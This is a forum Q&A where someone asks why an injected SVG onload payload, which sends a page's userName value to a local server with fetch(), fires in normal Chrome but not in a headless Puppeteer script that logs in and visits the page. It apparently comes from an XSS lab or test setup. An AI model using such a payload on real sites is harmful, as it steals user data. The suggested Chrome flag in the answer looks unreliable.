# Puppeteer javascript on page won't execute when running on headless mode

Tags: node.js, puppeteer

I have a page (secretpage.php) containing JavaScript in the HTTP response which sends the value of the userName parameter to my server.

```
<svg/onload=fetch('http://localhost:8080/username='+document.getElementById("userName").innerHTML)>
```

On non-headless mode running Chrome, the JavaScript executed successfully and I got a callback on my local server with the value of the "userName" sent back.

However, on headless mode, the JavaScript did not execute at all which is quite puzzling.

I have attached my js file (test.js) here for reference.

```
node test.js
```

Output of test.js below

```
const puppeteer = require('puppeteer');

(async () => {
  //const browser = await puppeteer.launch({ headless: false });
  const browser = await puppeteer.launch();
  const page = await browser.newPage();
  await page.goto('http://localhost/forum/');
  await page.type("#lbluserName", "john", { delay: 100 });
  await page.type("#lblpassword", "password", { delay: 100 });
  await page.click("#btnLogin");
  //await page.waitForNavigation();
  await page.waitFor(5000);
  await page.setViewport({
  width: 1280,
  height: 800,
  deviceScaleFactor: 1,
});
  await page.goto('http://localhost/forum/pages/secretpage.php');
  await page.waitForSelector('#comments');
  await page.screenshot({ path: 'screenshot.png' });
  await browser.close();
})();
```

Could anyone please help with troubleshooting this as this is rather peculiar?

Thank you!

Answer (score 0):

I think you need to run chrome with enabling js in headless mode.

```
await puppeteer.launch({
      args: [
        '--enable-features=ExperimentalJavaScript'
      ]
})
```

Comment: I tried this but no luck unfortunately. 
Do you have any alternatives?

Comment: check the chromium envirement runtime options maybe could be helpful